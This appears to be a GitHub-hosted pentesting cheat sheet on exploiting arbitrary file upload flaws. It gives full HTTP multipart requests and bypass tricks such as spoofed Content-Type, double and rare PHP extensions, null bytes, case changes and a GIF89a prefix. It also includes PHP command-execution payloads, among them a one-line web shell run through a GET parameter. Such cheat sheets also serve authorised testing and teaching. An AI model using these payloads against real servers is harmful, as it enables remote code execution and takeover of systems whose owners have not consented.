Skip to content

Latest commit

 

History

History
91 lines (74 loc) · 1.99 KB

Arbitrary File Upload.md

File metadata and controls

91 lines (74 loc) · 1.99 KB

Arbitrary File Upload

Introduction

An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server.

Where to find

In upload file feature, for example upload photo profile feature

How to exploit

  1. Change the Content-Type value
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php

Change the Content-Type

POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/jpeg
  1. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
Content-Type: application/x-php

Change the request to this

POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php
  1. Upload the payload, but start with GIF89a; and
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/gif

GIF89a; <?php system("id") ?>

And dont forget to change the content-type to image/gif

  1. Bypass content length validation, it can be bypassed using small payload
(<?=`$_GET[x]`?>)
  1. Using null byte in filename
file.php%00.gif
  1. Using double extensions for the uploaded file
file.jpg.php
  1. Uploading an unpopular php extensions (php4,php5,php6,phtml)
file.php5
  1. Try to randomly capitalizes the file extension
file.pHP5
  1. Mix the tips!